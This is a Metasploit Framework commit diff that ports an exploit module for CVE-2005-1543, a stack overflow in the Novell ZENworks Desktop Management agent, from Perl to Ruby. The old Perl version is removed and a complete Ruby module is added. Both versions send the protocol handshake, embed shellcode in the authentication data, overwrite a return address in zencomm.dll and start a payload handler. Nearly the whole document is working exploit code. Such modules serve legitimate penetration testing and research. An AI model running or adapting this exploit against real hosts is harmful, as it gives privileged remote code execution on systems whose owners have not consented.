Ported
git-svn-id: file:///home/svn/incoming/trunk@3133 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
7624b4d78a
commit
53425595e7
|
@ -1,194 +0,0 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'ZENworks 6.5 Desktop/Server Management Remote Stack Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a heap overflow in the Novell ZENworks
|
||||
Desktop Management agent. This vulnerability was discovered
|
||||
by Alex Wheeler.
|
||||
|
||||
},
|
||||
'Author' => [ 'anonymous' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '16698'],
|
||||
[ 'CVE', '2005-1543'],
|
||||
[ 'BID', '13678'],
|
||||
[ 'MIL', '91'],
|
||||
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 32767,
|
||||
'BadChars' => "\x00",
|
||||
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Automatic Targetting',
|
||||
{
|
||||
'Platform' => 'win32, winnt, winxp, win2k, win2003',
|
||||
'Ret' => 0x0,
|
||||
},
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'May 19 2005',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
=begin
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be redistributed
|
||||
# according to the licenses defined in the Authors field below. In the
|
||||
# case of an unknown or missing license, this file defaults to the same
|
||||
# license as the core Framework (dual GPLv2 and Artistic). The latest
|
||||
# version of the Framework can always be obtained from metasploit.com.
|
||||
##
|
||||
|
||||
package Msf::Exploit::zenworks_desktop_agent;
|
||||
use strict;
|
||||
use base "Msf::Exploit";
|
||||
use Pex::Text;
|
||||
|
||||
my $advanced = { };
|
||||
|
||||
my $info =
|
||||
{
|
||||
'Name' => 'ZENworks 6.5 Desktop/Server Management Remote Stack Overflow',
|
||||
'Version' => '$Revision$',
|
||||
'Authors' => [ 'anonymous' ],
|
||||
|
||||
'Arch' => [ 'x86' ],
|
||||
'OS' => [ 'win32', 'winnt', 'winxp', 'win2k', 'win2003' ],
|
||||
'Priv' => 1,
|
||||
|
||||
'UserOpts' =>
|
||||
{
|
||||
'RHOST' => [1, 'ADDR', 'The target address'],
|
||||
'RPORT' => [1, 'PORT', 'The target port', 1761],
|
||||
},
|
||||
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 0x7FFF,
|
||||
'BadChars' => "\x00",
|
||||
'Keys' => ['+ws2ord'],
|
||||
},
|
||||
|
||||
'Description' => Pex::Text::Freeform(qq{
|
||||
This module exploits a heap overflow in the Novell ZENworks
|
||||
Desktop Management agent. This vulnerability was discovered by
|
||||
Alex Wheeler.
|
||||
}),
|
||||
|
||||
'Refs' =>
|
||||
[
|
||||
['OSVDB', '16698'],
|
||||
['CVE', '2005-1543'],
|
||||
['BID', '13678'],
|
||||
['MIL', '91'],
|
||||
],
|
||||
|
||||
'DefaultTarget' => 0,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XP/2000/2003- ZENworks 6.5 Desktop/Server Agent', 0x10002e06]
|
||||
],
|
||||
|
||||
'Keys' => ['zenworks'],
|
||||
|
||||
'DisclosureDate' => 'May 19 2005',
|
||||
};
|
||||
|
||||
sub new {
|
||||
my $class = shift;
|
||||
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
|
||||
return($self);
|
||||
}
|
||||
|
||||
sub Exploit {
|
||||
my $self = shift;
|
||||
my $target_host = $self->GetVar('RHOST');
|
||||
my $target_port = $self->GetVar('RPORT');
|
||||
my $target_idx = $self->GetVar('TARGET');
|
||||
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
|
||||
my $target = $self->Targets->[$target_idx];
|
||||
|
||||
$self->PrintLine( "[*] Attempting to exploit " . $target->[0] );
|
||||
|
||||
my $s = Msf::Socket::Tcp->new(
|
||||
'PeerAddr' => $target_host,
|
||||
'PeerPort' => $target_port,
|
||||
'LocalPort' => $self->GetVar('CPORT'),
|
||||
);
|
||||
|
||||
if ( $s->IsError ) {
|
||||
$self->PrintLine( '[*] Error creating socket: ' . $s->GetError );
|
||||
return;
|
||||
}
|
||||
|
||||
my $req = "\x00\x06\x05\x01\x10\xe6\x01\x00\x34\x5a\xf4\x77\x80\x95\xf8\x77";
|
||||
$self->PrintLine( "[*] Sending version identication" );
|
||||
$s->Send($req);
|
||||
|
||||
my $ident = $s->Recv(-1, 16);
|
||||
if (length($ident) != 16) {
|
||||
$self->PrintLine( "[*] Failed to receive agent version identication" );
|
||||
return;
|
||||
}
|
||||
else {
|
||||
$self->PrintLine( "[*] Received agent version identication" );
|
||||
}
|
||||
|
||||
$req = "\x00\x01";
|
||||
$self->PrintLine( "[*] Sending client acknowledgment" );
|
||||
$s->Send($req);
|
||||
|
||||
# stack overflow in ZenRem32.exe / ZENworks Server Management
|
||||
$req = "\x00\x06metmet\x00\x06metmet\x7F\xFF" . $shellcode . "\x00\x01";
|
||||
$self->PrintLine( "[*] Sending authentication data (including shellcode)" );
|
||||
$s->Send($req);
|
||||
|
||||
$s->Recv(2, 2);
|
||||
$s->Send("\x00\x01");
|
||||
$s->Send("\x00\x02");
|
||||
|
||||
$self->PrintLine( "[*] Sending final payload" );
|
||||
|
||||
# pop/pop/pop/pop/pop/ret in zencomm.dll on our shellcode
|
||||
my $crash = "A" x 0x20;
|
||||
$req = "\x00\x24" . $crash . pack('V', $target->[1]);
|
||||
$s->Send($req);
|
||||
|
||||
$self->PrintLine("[*] Overflow request sent, sleeping for four seconds");
|
||||
select(undef, undef, undef, 4);
|
||||
|
||||
$self->Handler($s);
|
||||
return;
|
||||
}
|
||||
|
||||
1;
|
||||
|
||||
=end
|
||||
|
||||
|
||||
end
|
||||
end
|
|
@ -0,0 +1,84 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Windows::Novell::ZenworksDesktopAgentOverflow < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'ZENworks 6.5 Desktop/Server Management Remote Stack Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a heap overflow in the Novell ZENworks
|
||||
Desktop Management agent. This vulnerability was discovered
|
||||
by Alex Wheeler.
|
||||
|
||||
},
|
||||
'Author' => [ 'anonymous' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '16698'],
|
||||
[ 'CVE', '2005-1543'],
|
||||
[ 'BID', '13678'],
|
||||
[ 'MIL', '91'],
|
||||
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 32767,
|
||||
'BadChars' => "\x00",
|
||||
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Windows XP/2000/2003- ZENworks 6.5 Desktop/Server Agent',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Ret' => 0x10002e06,
|
||||
},
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'May 19 2005',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
hello = "\x00\x06\x05\x01\x10\xe6\x01\x00\x34\x5a\xf4\x77\x80\x95\xf8\x77"
|
||||
print_status("Sending version identification")
|
||||
sock.put(hello)
|
||||
|
||||
ident = sock.get_once
|
||||
if (not (ident and ident.length == 16))
|
||||
print_status("Failed to receive agent version identification")
|
||||
return
|
||||
end
|
||||
|
||||
print_status("Received agent version identification")
|
||||
print_status("Sending client acknowledgement")
|
||||
sock.put("\x00\x01")
|
||||
|
||||
# Stack overflow in ZenRem32.exe / ZENworks Server Management
|
||||
sock.put("\x00\x06metmet\x00\x06metmet\x7f\xff" + payload.encoded + "\x00\x01")
|
||||
|
||||
ack = sock.get_once
|
||||
sock.put("\x00\x01")
|
||||
sock.put("\x00\x02")
|
||||
|
||||
print_status("Sending final payload")
|
||||
sock.put("\x00\x24" + ("A" * 0x20) + [ target.ret ].pack('V'))
|
||||
|
||||
print_status("Overflow request sent, sleeping for four seconds")
|
||||
select(nil, nil, nil, 4)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue